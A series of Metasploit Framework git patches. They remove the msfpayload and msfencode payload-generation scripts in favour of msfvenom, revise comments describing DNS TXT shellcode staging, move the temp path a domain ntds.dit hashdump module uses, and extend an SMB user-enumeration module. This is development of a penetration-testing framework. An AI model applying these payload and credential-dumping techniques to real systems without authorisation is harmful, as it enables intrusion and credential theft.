rename to modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb

From 5a6a16c4ec84b09cacf51abb1b1eaf5ccfb8955c Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 8 Jun 2015 11:30:04 -0500
Subject: [PATCH 0354/1013] Resolve #4326, remove msfpayload & msfencode. Use
 msfvenom instead!

msfpayload and msfencode are no longer in metasploit. Please use
msfvenom instead.

Resolves #4326
---
 .../DLLHijackAuditKit/regenerate_binaries.rb  |  10 +-
 external/zsh/_msfencode                       |  82 -----
 lib/msf/util/exe.rb                           |   2 +-
 metasploit-framework.gemspec                  |   1 -
 .../singles/windows/dns_txt_query_exec.rb     |   8 +-
 msfencode                                     | 306 ------------------
 msfpayload                                    | 269 ---------------
 7 files changed, 10 insertions(+), 668 deletions(-)
 delete mode 100644 external/zsh/_msfencode
 delete mode 100755 msfencode
 delete mode 100755 msfpayload

diff --git a/external/source/DLLHijackAuditKit/regenerate_binaries.rb b/external/source/DLLHijackAuditKit/regenerate_binaries.rb
index a396b542b8..5e2b8a0ef7 100755
--- a/external/source/DLLHijackAuditKit/regenerate_binaries.rb
+++ b/external/source/DLLHijackAuditKit/regenerate_binaries.rb
@@ -2,12 +2,12 @@
 
 dllbase = File.expand_path(File.dirname(__FILE__))
 msfbase = File.expand_path(File.join(dllbase, "..", "..", ".."))
-msfp    = File.join(msfbase, "msfpayload")
+msfv    = File.join(msfbase, "msfvenom")
 
 Dir.chdir(dllbase)
 
-system("ruby #{msfp} windows/exec CMD=calc.exe X > runcalc.exe")
-system("ruby #{msfp} windows/exec CMD=calc.exe D > runcalc.dll")
-system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' D > runtest.dll")
-system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' X > runtest.exe")
+system("ruby #{msfv} -p windows/exec CMD=calc.exe -f exe -o runcalc.exe")
+system("ruby #{msfv} -p windows/exec CMD=calc.exe -f dll -o runcalc.dll")
+system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f dll -o runtest.dll")
+system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f exe -o runtest.exe")
 
diff --git a/external/zsh/_msfencode b/external/zsh/_msfencode
deleted file mode 100644
index b0dca78c05..0000000000
--- a/external/zsh/_msfencode
+++ /dev/null
@@ -1,82 +0,0 @@
-#compdef msfencode
-# ------------------------------------------------------------------------------
-# License
-# -------
-# This file is part of the Metasploit Framework and is released under the MSF
-# License, please see the COPYING file for more details.
-#
-# ------------------------------------------------------------------------------
-# Description
-# -----------
-#
-#  Completion script for the Metasploit Framework's msfencode command
-#  (http://www.metasploit.com/).
-#
-# ------------------------------------------------------------------------------
-# Authors
-# -------
-#
-#  * Spencer McIntyre
-#
-# ------------------------------------------------------------------------------
-
-_msfencode_encoders_list=(
-  'cmd/generic_sh'
-  'cmd/ifs'
-  'cmd/powershell_base64'
-  'cmd/printf_php_mq'
-  'generic/eicar'
-  'generic/none'
-  'mipsbe/byte_xori'
-  'mipsbe/longxor'
-  'mipsle/byte_xori'
-  'mipsle/longxor'
-  'php/base64'
-  'ppc/longxor'
-  'ppc/longxor_tag'
-  'sparc/longxor_tag'
-  'x64/xor'
-  'x86/add_sub'
-  'x86/alpha_mixed'
-  'x86/alpha_upper'
-  'x86/avoid_underscore_tolower'
-  'x86/avoid_utf8_tolower'
-  'x86/bloxor'
-  'x86/call4_dword_xor'
-  'x86/context_cpuid'
-  'x86/context_stat'
-  'x86/context_time'
-  'x86/countdown'
-  'x86/fnstenv_mov'
-  'x86/jmp_call_additive'
-  'x86/nonalpha'
-  'x86/nonupper'
-  'x86/opt_sub'
-  'x86/shikata_ga_nai'
-  'x86/single_static_bit'
-  'x86/unicode_mixed'
-  'x86/unicode_upper'
-)
-
-_msfencode_encoder() {
-  _describe -t encoders 'available encoders' _msfencode_encoders_list || compadd "$@"
-}
-
-_arguments \
-  "-a[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
-  "-b[The list of characters to avoid, example: '\x00\xff']:bad characters" \
-  "-c[The number of times to encode the data]:times" \
-  "-d[Specify the directory in which to look for EXE templates]:template file:_files -/" \
-  "-e[The encoder to use]:encoder:_msfencode_encoder" \
-  "-h[Help banner]" \
-  "-i[Encode the contents of the supplied file path]:input file:_files" \
-  "-k[Keep template working; run payload in new thread (use with -x)]" \
-  "-l[List available encoders]" \
-  "-m[Specifies an additional module search path]:module path:_files -/" \
-  "-n[Dump encoder information]" \
-  "-o[The output file]:output file" \
-  "-p[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
-  "-s[The maximum size of the encoded data]:maximum size" \
-  "-t[The output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
-  "-v[Increase verbosity]" \
-  "-x[Specify an alternate executable template]:template file:_files"
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index d0489fed0c..b20a091633 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1811,7 +1811,7 @@ require 'msf/core/exe/segment_appender'
   # Generate an executable of a given format suitable for running on the
   # architecture/platform pair.
   #
-  # This routine is shared between msfencode, rpc, and payload modules (use
+  # This routine is shared between msfvenom, rpc, and payload modules (use
   # <payload>)
   #
   # @param framework [Framework]
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 2736b60a4e..376f22f6b6 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -36,7 +36,6 @@ Gem::Specification.new do |spec|
       'msfelfscan',
       'msfencode',
       'msfmachscan',
-      'msfpayload',
       'msfpescan',
       'msfrop',
       'msfrpc',
diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb
index 6737a0b954..db3d09cffb 100644
--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -40,10 +40,10 @@ module Metasploit3
   # 1. Generate the shellcode you want to deliver via DNS TXT queries
   #    Make sure the shellcode is alpha_mixed or alpha_upper and uses EDI as bufferregister
   #    Example :
-  #   ./msfpayload windows/messagebox TITLE="Friendly message from corelanc0d3r" TEXT="DNS Payloads FTW" R | ./msfencode -e x86/alpha_mixed Bufferregister=EDI -t raw
-  #    Output : 654 bytes
+  #   ./msfvenom -p windows/messagebox TITLE="Friendly message from corelanc0d3r" TEXT="DNS Payloads FTW" -e x86/alpha_mixed Bufferregister=EDI -f raw
+  #    Output : 658 bytes
   # 2. Split the alpha shellcode into individual parts of exactly 255 bytes (+ remaining bytes)
-  #    In case of 654 bytes of payload, there will be 2 parts of 255 bytes, and one part of 144 bytes
+  #    In case of 658 bytes of payload, there will be 2 parts of 255 bytes, and one part of 144 bytes
   # 3. Create TXT records in a zone you control and put in a piece of the shellcode in each TXT record
   #    The last TXT record might have less than 255 bytes, that's fine
   #    The first part must be stored in the TXT record for prefix a.<yourdomain.com>
@@ -51,7 +51,7 @@ module Metasploit3
   #    etc
   #    First part must start with a.  and all parts must be placed in consecutive records
   # 4. use the dns_txt_query payload in the exploit, specify the name of the DNS zone that contains the DNS TXT records
-  #    Example : /msfpayload windows/dns_txt_query_exec DNSZONE=corelan.eu C
+  #    Example: ./msfvenom -p windows/dns_txt_query_exec DNSZONE=corelan.eu -f c
   #    (Example will show a messagebox)
   #
   # DNS TXT Records :
diff --git a/msfencode b/msfencode
deleted file mode 100755
index 79fa985f2c..0000000000
--- a/msfencode
+++ /dev/null
@@ -1,306 +0,0 @@
-#!/usr/bin/env ruby
-# -*- coding: binary -*-
-#
-# $Id$
-# $Revision$
-#
-
-$stderr.puts "[!] ************************************************************************"
-$stderr.puts "[!] *               The utility msfencode is deprecated!                   *"
-$stderr.puts "[!] *              It will be removed on or about 2015-06-08               *"
-$stderr.puts "[!] *                   Please use msfvenom instead                        *"
-$stderr.puts "[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *"
-$stderr.puts "[!] ************************************************************************"
-
-msfbase = __FILE__
-while File.symlink?(msfbase)
-  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
-end
-
-$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
-require 'msfenv'
-
-
-
-$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
-
-require 'rex'
-require 'msf/ui'
-require 'msf/base'
-
-OutStatus = "[*] "
-OutError  = "[-] "
-
-# Load supported formats
-supported_formats = Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats
-
-$args = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help banner"                                                       ],
-  "-l" => [ false, "List available encoders"                                           ],
-  "-v" => [ false, "Increase verbosity"                                                ],
-  # input/output
-  "-i" => [ true, "Encode the contents of the supplied file path"                      ],
-  "-m" => [ true, "Specifies an additional module search path"                         ],
-  "-o" => [ true, "The output file"                                                    ],
-  # architecture/platform
-  "-a" => [ true, "The architecture to encode as"                                      ],
-  "-p" => [ true, "The platform to encode for"                                         ],
-  # format options
-  "-t" => [ true, "The output format: #{supported_formats.join(',')}"                  ],
-  # encoder options
-  "-e" => [ true, "The encoder to use"                                                 ],
-  "-n" => [ false, "Dump encoder information"                                          ],
-  "-b" => [ true, "The list of characters to avoid: '\\x00\\xff'"                      ],
-  "-s" => [ true, "The maximum size of the encoded data"                               ],
-  "-c" => [ true, "The number of times to encode the data"                             ],
-  # EXE generation options
-  "-d" => [ true, "Specify the directory in which to look for EXE templates"           ],
-  "-x" => [ true, "Specify an alternate executable template"                           ],
-  "-k" => [ false, "Keep template working; run payload in new thread (use with -x)"    ]
-)
-
-#
-# Dump the list of encoders
-#
-def dump_encoders(arch = nil)
-  tbl = Rex::Ui::Text::Table.new(
-    'Indent'  => 4,
-    'Header'  => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""),
-    'Columns' =>
-      [
-        "Name",
-        "Rank",
-        "Description"
-      ])
-  cnt = 0
-
-  $framework.encoders.each_module(
-    'Arch' => arch ? arch.split(',') : nil) { |name, mod|
-    tbl << [ name, mod.rank_to_s, mod.new.name ]
-
-    cnt += 1
-  }
-
-  (cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n"
-end
-
-#
-# Returns the list of encoders to try
-#
-def get_encoders(arch, encoder)
-  encoders = []
-
-  if (encoder)
-    encoders << $framework.encoders.create(encoder)
-  else
-    $framework.encoders.each_module_ranked(
-      'Arch' => arch ? arch.split(',') : nil) { |name, mod|
-      encoders << mod.new
-    }
-  end
-
-  encoders
-end
-
-#
-# Nuff said.
-#
-def usage
-  $stderr.puts("\n" + "    Usage: #{$0} <options>\n" + $args.usage)
-  exit
-end
-
-def write_encoded(buf)
-  if (not $output)
-    $stdout.write(buf)
-  else
-    File.open($output, "wb") do |fd|
-      fd.write(buf)
-    end
-  end
-end
-
-# Defaults
-verbose  = 0
-cmd      = "encode"
-arch     = nil
-badchars = ''
-space    = nil
-encoder  = nil
-fmt      = nil
-input    = $stdin
-options  = ''
-delim    = '_|_'
-output   = nil
-ecount   = 1
-plat     = nil
-
-altexe   = nil
-inject   = false
-exedir   = nil  # use default
-
-# Parse the argument and rock it
-$args.parse(ARGV) { |opt, idx, val|
-  case opt
-    when "-i"
-      begin
-        input = File.open(val, 'rb')
-      rescue
-        $stderr.puts(OutError + "Failed to open file #{val}: #{$!}")
-        exit
-      end
-    when "-m"
-      $framework.modules.add_module_path(val)
-    when "-l"
-      cmd = "list"
-    when "-n"
-      cmd = "dump"
-    when "-a"
-      arch = val
-    when "-c"
-      ecount = val.to_i
-    when "-b"
-      badchars = Rex::Text.hex_to_raw(val)
-    when "-p"
-      plat = Msf::Module::PlatformList.transform(val)
-    when "-s"
-      space = val.to_i
-    when "-t"
-      if supported_formats.include?(val)
-        fmt = val
-      else
-        $stderr.puts(OutError + "Invalid format: #{val}")
-        exit
-      end
-    when "-o"
-      $output = val
-    when "-e"
-      encoder = val
-
-    when "-d"
-      exedir = val
-    when "-x"
-      altexe = val
-    when "-k"
-      inject = true
-
-    when "-h"
-      usage
-
-    when "-v"
-      verbose += 1
-
-    else
-      if (val =~ /=/)
-        options += ((options.length > 0) ? delim : "") + "#{val}"
-      end
-  end
-}
-
-
-if(not fmt and output)
-  pre,ext = output.split('.')
-  if(ext and not ext.empty?)
-    fmt = ext
-  end
-end
-
-if inject and not altexe
-  $stderr.puts "[*] Error: the injection option must use a custom EXE template via -x, otherwise the injected payload will immediately exit when the main process dies."
-  exit(1)
-end
-exeopts = {
-  :inject => inject,
-  :template => altexe,
-  :template_path => exedir
-}
-
-# Initialize the simplified framework instance.
-$framework = Msf::Simple::Framework.create(
-  :module_types => [ Msf::MODULE_ENCODER, Msf::MODULE_NOP ],
-  'DisableDatabase' => true
-)
-
-# Get the list of encoders to try
-encoders = get_encoders(arch, encoder)
-
-# Process the actual command
-case cmd
-  when "list"
-    $stderr.puts(dump_encoders(arch))
-  when "dump"
-    enc = encoder ? $framework.encoders.create(encoder) : nil
-
-    if (enc)
-      $stderr.puts(Msf::Serializer::ReadableText.dump_module(enc))
-    else
-      $stderr.puts(OutError + "Invalid encoder specified.")
-    end
-  when "encode"
-    input.binmode  # ensure its in binary mode
-    buf = input.read
-
-    encoders.each { |enc|
-      next if not enc
-      begin
-        # Imports options
-        enc.datastore.import_options_from_s(options, delim)
-
-        skip = false
-        eout = buf.dup
-        raw  = nil
-
-        1.upto(ecount) do |iteration|
-
-          # Encode it up
-          raw = enc.encode(eout, badchars, nil, plat)
-
-          # Is it too big?
-          if (space and space > 0 and raw.length > space)
-            $stderr.puts(OutError + "#{enc.refname} created buffer that is too big (#{raw.length})")
-            skip = true
-            break
-          end
-
-          # Print it out
-          $stderr.puts(OutStatus + "#{enc.refname} succeeded with size #{raw.length} (iteration=#{iteration})\n\n")
-          eout = raw
-        end
-
-        next if skip
-
-        output = Msf::Util::EXE.to_executable_fmt($framework, arch, plat, raw, fmt, exeopts)
-
-        if not output
-          fmt ||= "ruby"
-          output = Msf::Simple::Buffer.transform(raw, fmt)
-        end
-
-        if exeopts[:fellback]
-          $stderr.puts(OutError + "Warning: Falling back to default template: #{exeopts[:fellback]}")
-        end
-
-        write_encoded(output)
-
-        exit
-
-      #
-      # These exception codes are fatal, we shouldn't expect them to succeed on the next
-      # iteration, nor the next encoder.
-      #
-      rescue ::Errno::ENOENT, ::Errno::EINVAL
-        $stderr.puts(OutError + "#{enc.refname} failed: #{$!}")
-        break
-
-      rescue => e
-        $stderr.puts(OutError + "#{enc.refname} failed: #{e}")
-        if verbose > 0
-          e.backtrace.each { |el|
-            $stderr.puts(OutError + el.to_s)
-          }
-        end
-      end
-    }
-
-    $stderr.puts(OutError + "No encoders succeeded.")
-end
diff --git a/msfpayload b/msfpayload
deleted file mode 100755
index b180bac016..0000000000
--- a/msfpayload
+++ /dev/null
@@ -1,269 +0,0 @@
-#!/usr/bin/env ruby
-# -*- coding: binary -*-
-#
-# $Id$
-# $Revision$
-#
-
-$stderr.puts "[!] ************************************************************************"
-$stderr.puts "[!] *               The utility msfpayload is deprecated!                  *"
-$stderr.puts "[!] *              It will be removed on or about 2015-06-08               *"
-$stderr.puts "[!] *                   Please use msfvenom instead                        *"
-$stderr.puts "[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *"
-$stderr.puts "[!] ************************************************************************"
-
-msfbase = __FILE__
-while File.symlink?(msfbase)
-  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
-end
-
-$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
-require 'msfenv'
-
-
-
-$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
-
-require 'rex'
-
-$args = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help banner"                                                       ],
-  "-l" => [ false, "List available payloads"                                           ]
-)
-
-#
-# Nuff said.
-#
-def usage
-  $stderr.puts("\n" +
-    "    Usage: #{$0} [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|" +
-    "[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>\n" +
-    $args.usage)
-  exit
-end
-
-cmd = nil
-rest = []
-
-# Parse the argument and rock it
-$args.parse(ARGV) { |opt, idx, val|
-  #puts "opt[%d]: #{opt.inspect} / #{val.inspect}" % idx
-
-  case opt
-  when "-l"
-    cmd = "list"
-    break
-
-  # Non-option (don't begin with '-') are processed here
-  when nil
-    rest << val
-
-  end
-}
-
-usage if cmd != "list" && rest.length < 2
-
-require 'msf/ui'
-require 'msf/base'
-
-#
-# Dump the list of payloads
-#
-def dump_payloads
-  tbl = Rex::Ui::Text::Table.new(
-    'Indent'  => 4,
-    'Header'  => "Framework Payloads (#{$framework.stats.num_payloads} total)",
-    'Columns' =>
-      [
-        "Name",
-        "Description"
-      ])
-
-  $framework.payloads.each_module { |name, mod|
-    tbl << [ name, mod.new.description ]
-  }
-
-  "\n" + tbl.to_s + "\n"
-end
-
-# Initialize the simplified framework instance.
-$framework = Msf::Simple::Framework.create(
-  :module_types => [ Msf::MODULE_PAYLOAD, Msf::MODULE_NOP ],
-  'DisableDatabase' => true
-)
-
-if cmd == "list"
-  puts dump_payloads
-  exit
-end
-
-
-# Get the payload name we'll be using
-payload_name = rest.shift
-
-# Process special var/val pairs...
-Msf::Ui::Common.process_cli_arguments($framework, rest)
-
-# Create the payload instance
-payload = $framework.payloads.create(payload_name)
-
-if (payload == nil)
-  $stderr.puts "Invalid payload: #{payload_name}"
-  exit
-end
-
-# Evalulate the command
-cmd = rest.pop.downcase
-
-# Populate the framework datastore
-options = {}
-rest.each do |x|
-  k,v = x.split("=", 2)
-  options[k.upcase] = v.to_s
-end
-
-# if LHOST is not set auto set it
-if payload_name =~ /[\_\/]reverse/ and options['LHOST'].nil?
-  options['LHOST'] = Rex::Socket.source_address
-end
-
-
-payload.datastore.merge! options
-
-if cmd =~ /^(p|y|r|d|c|h|j|x|b|v|w|n|o)$/
-  fmt = 'perl' if cmd =~ /^p$/
-  fmt = 'ruby' if cmd =~ /^y$/
-  fmt = 'raw' if cmd =~ /^(r|x|d|o)$/
-  fmt = 'raw' if cmd =~ /^v$/
-  fmt = 'c' if cmd =~ /^c$/
-  fmt = 'csharp' if cmd =~ /^h$/
-  fmt = 'js_be' if cmd =~ /^j$/ && Rex::Arch.endian(payload.arch) == ENDIAN_BIG
-  fmt = 'js_le' if cmd =~ /^j$/ && !fmt
-  fmt = 'java'  if cmd =~ /^b$/
-  fmt = 'raw' if cmd =~ /^w$/
-  fmt = 'python' if cmd =~ /^n$/
-  enc = options['ENCODER']
-
-  begin
-    buf = payload.generate_simple(
-        'Format'    => fmt,
-        'Options'   => options)
-  rescue
-    $stderr.puts "Error generating payload: #{$!}"
-    exit
-  end
-
-  $stdout.binmode
-
-  if cmd =~ /^x$/
-    note =
-      "Created by msfpayload (http://www.metasploit.com).\n" +
-      "Payload: " + payload.refname + "\n" +
-      " Length: " + buf.length.to_s + "\n" +
-      "Options: " + options.inspect + "\n"
-
-    arch = payload.arch
-    plat = payload.platform.platforms
-
-    exe  = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
-
-    if !exe && plat.index(Msf::Module::Platform::Java)
-      exe = payload.generate_jar.pack
-    end
-
-    if exe
-      $stderr.puts(note)
-      $stdout.write(exe)
-      exit(0)
-    end
-
-    $stderr.puts "No executable format support for this arch/platform"
-    exit(-1)
-  end
-
-  if cmd =~ /^v$/
-    exe = Msf::Util::EXE.to_win32pe($framework, buf)
-    note =
-      "'Created by msfpayload (http://www.metasploit.com).\r\n" +
-      "'Payload: " + payload.refname + "\r\n" +
-      "' Length: " + buf.length.to_s + "\r\n" +
-      "'Options: " + options.inspect + "\r\n"
-
-    vba = note + "\r\n" + Msf::Util::EXE.to_exe_vba(exe)
-    $stdout.write(vba)
-    exit(0)
-  end
-
-  if cmd =~ /^d$/
-    dll = Msf::Util::EXE.to_win32pe_dll($framework, buf)
-    note =
-      "Created by msfpayload (http://www.metasploit.com).\r\n" +
-      "Payload: " + payload.refname + "\r\n" +
-      " Length: " + buf.length.to_s + "\r\n" +
-      "Options: " + options.inspect + "\r\n"
-
-    if dll
-      $stderr.puts(note)
-      $stdout.write(dll)
-      exit(0)
-    end
-
-    $stderr.puts "Failed to build dll"
-    exit(-1)
-  end
-
-  if cmd =~ /^o$/
-    so = Msf::Util::EXE.to_linux_x64_elf_dll($framework, buf)
-    note =
-       "Created by msfpayload (http://www.metasploit.com).\r\n" +
-       "Payload: " + payload.refname + "\r\n" +
-       " Length: " + buf.length.to_s + "\r\n" +
-       "Options: " + options.inspect + "\r\n"
-
-    if so
-      $stderr.puts(note)
-      $stdout.write(so)
-      exit(0)
-    end
-
-    $stderr.puts "Failed to build dll"
-    exit(-1)
-  end
-
-  if cmd =~ /^w$/
-    note =
-      "Created by msfpayload (http://www.metasploit.com).\n" +
-      "Payload: " + payload.refname + "\n" +
-      " Length: " + buf.length.to_s + "\n" +
-      "Options: " + options.inspect + "\n"
-
-    arch = payload.arch
-    plat = payload.platform.platforms
-
-    exe  = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
-    if (!exe && payload.respond_to?(:generate_war))
-      exe = payload.generate_war.pack
-    elsif exe
-      exe  = Msf::Util::EXE.to_jsp_war(exe)
-    end
-
-    if exe
-      $stderr.puts(note)
-      $stdout.write(exe)
-      exit(0)
-    end
-
-    $stderr.puts "No executable format support for this arch/platform"
-    exit(-1)
-  end
-
-  $stdout.write(buf)
-
-elsif cmd =~ /^(s|o)$/
-  payload.datastore.import_options_from_s(rest.join('_|_'), '_|_')
-  puts Msf::Serializer::ReadableText.dump_module(payload)
-
-else
-  $stderr.puts "Invalid command: #{cmd.inspect}"
-
-end

From 07d1282afb44a4d5fde87f75d9dd5a1c9bcc7b07 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 8 Jun 2015 12:17:49 -0500
Subject: [PATCH 0355/1013] Correct file naming for better Ruby coding style

---
 .../core/exploit/{browserautopwnv2.rb => browser_autopwnv2.rb}  | 0
 lib/msf/core/exploit/mixins.rb                                  | 2 +-
 2 files changed, 1 insertion(+), 1 deletion(-)
 rename lib/msf/core/exploit/{browserautopwnv2.rb => browser_autopwnv2.rb} (100%)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
similarity index 100%
rename from lib/msf/core/exploit/browserautopwnv2.rb
rename to lib/msf/core/exploit/browser_autopwnv2.rb
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index 91024ae873..80afde7037 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -104,4 +104,4 @@ require 'msf/core/exploit/android'
 
 # Browser Exploit Server
 require 'msf/core/exploit/remote/browser_exploit_server'
-require 'msf/core/exploit/browserautopwnv2'
+require 'msf/core/exploit/browser_autopwnv2'

From bb56f6043e4dd7d45949e32d50857d225eca96c1 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Mon, 8 Jun 2015 13:17:18 -0500
Subject: [PATCH 0356/1013] explicitly use windows\temp

instead of using the user temp directory
trying to get around some intermittant permissions
issues

MSP-12358
---
 modules/post/windows/gather/credentials/domain_hashdump.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 615533b095..18f3f7487b 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Post
   end
 
   def ntdsutil_method
-    tmp_path = "#{get_env("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    tmp_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
     result = cmd_exec("ntdsutil.exe", command_arguments,90)
     if result.include? "IFM media created successfully"
@@ -147,7 +147,7 @@ class Metasploit3 < Msf::Post
     print_status "Getting Details of ShadowCopy #{id}"
     sc_details = get_sc_details(id)
     sc_path = "#{sc_details['DeviceObject']}\\windows\\ntds\\ntds.dit"
-    target_path = "#{get_env("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    target_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     print_status "Moving ntds.dit to #{target_path}"
     move_file(sc_path, target_path)
     target_path

From 8381d4f994d947701281421a374f5efa584df129 Mon Sep 17 00:00:00 2001
From: Josh Abraham <jabra@spl0it.org>
Date: Mon, 8 Jun 2015 19:42:03 -0400
Subject: [PATCH 0357/1013] update smb_enumusers_domain to store enumerated
 users in the DB

---
 .../scanner/smb/smb_enumusers_domain.rb       | 36 +++++++++++++++----
 1 file changed, 29 insertions(+), 7 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
index bf391d893f..250b2b9cf0 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
@@ -10,8 +10,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   # Exploit mixins should be called first
-  include Msf::Exploit::Remote::SMB
-  include Msf::Exploit::Remote::SMB::Authenticated
+  include Msf::Exploit::Remote::SMB::Client
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
   include Msf::Exploit::Remote::DCERPC
 
   # Scanner mixin should be near last
@@ -23,7 +23,11 @@ class Metasploit3 < Msf::Auxiliary
       'Name'        => 'SMB Domain User Enumeration',
       'Version'     => '$Revision $',
       'Description' => 'Determine what domain users are logged into a remote system via a DCERPC to NetWkstaUserEnum.',
-      'Author'      => 'natron',
+      'Author'      =>
+        [
+          'natron', # orignal module
+          'Joshua D. Abraham <jabra[at]praetorian.com>', # database storage
+        ],
       'References'  =>
         [
           [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa370669%28VS.85%29.aspx' ]
@@ -43,7 +47,6 @@ class Metasploit3 < Msf::Auxiliary
     val_actual = resp[idx,4].unpack("V")[0]
     idx += 4
     value	= resp[idx,val_actual*2]
-    #print_debug "resp[0x#{idx.to_s(16)},#{val_actual*2}] : " + value
     idx += val_actual * 2
 
     idx += val_actual % 2 * 2 # alignment
@@ -54,15 +57,12 @@ class Metasploit3 < Msf::Auxiliary
   def parse_NetWkstaEnumUsersInfo(resp)
     accounts = [ Hash.new() ]
 
-    #print_debug resp[0,20].unpack("H*")
     idx = 20
     count = resp[idx,4].unpack("V")[0] # wkssvc_NetWkstaEnumUsersInfo -> Info -> PtrCt0 -> User() -> Ptr -> Max Count
     idx += 4
-    #print_debug "Max Count  : " + count.to_s
 
     1.upto(count) do
       # wkssvc_NetWkstaEnumUsersInfo -> Info -> PtrCt0 -> User() -> Ptr -> Ref ID
-      # print_debug "Ref ID#{account.to_s}: " + resp[idx,4].unpack("H*").to_s
       idx += 4 # ref id name
       idx += 4 # ref id logon domain
       idx += 4 # ref id other domains
@@ -142,6 +142,28 @@ class Metasploit3 < Msf::Auxiliary
           print_status "#{ip} : #{accounts.collect{|x| x[:logon_domain] + "\\" + x[:account_name]}.join(", ")}"
         end
 
+        found_accounts = []
+        accounts.each do |x|
+          comp_user = x[:logon_domain] + "\\" + x[:account_name]
+          found_accounts.push(comp_user.scan(/[[:print:]]/).join) unless found_accounts.include?(comp_user.scan(/[[:print:]]/).join)
+        end
+
+        found_accounts.each do |comp_user|
+          if comp_user.to_s =~ /\$$/
+            next
+          end
+
+          print_good("#{ip} - Found user: #{comp_user}")
+          report_note(
+            :host => ip,
+            :proto  => 'tcp',
+            :port => rport,
+            :type => 'smb_loggedin_users',
+            :data => { :user => comp_user },
+            :update => :unique_data
+          )
+        end
+
       rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
         print_line("UUID #{uuid[0]} #{uuid[1]} ERROR 0x%.8x" % e.error_code)
         #puts e

From a48d79a2e727bda6efc07261f9a325a533b3a3fe Mon Sep 17 00:00:00 2001
From: Ramon de C Valle <rcvalle@rcvalle.com>
Date: Mon, 8 Jun 2015 19:41:17 -0700
Subject: [PATCH 0358/1013] Add jsse_skiptls_mitm_proxy.rb

This module exploits an incomplete internal state distinction in Java
Secure Socket Extension (JSSE) by impersonating the server and finishing
the handshake before the peers have authenticated themselves and
instantiated negotiated security parameters, resulting in a plaintext
SSL/TLS session with the client. This plaintext SSL/TLS session is then
proxied to the server using a second SSL/TLS session from the proxy to
the server (or an alternate fake server) allowing the session to
continue normally and plaintext application data transmitted between the
peers to be saved. This module requires an active man-in-the-middle
attack.
---
 .../server/jsse_skiptls_mitm_proxy.rb         | 248 ++++++++++++++++++
 1 file changed, 248 insertions(+)
 create mode 100644 modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb

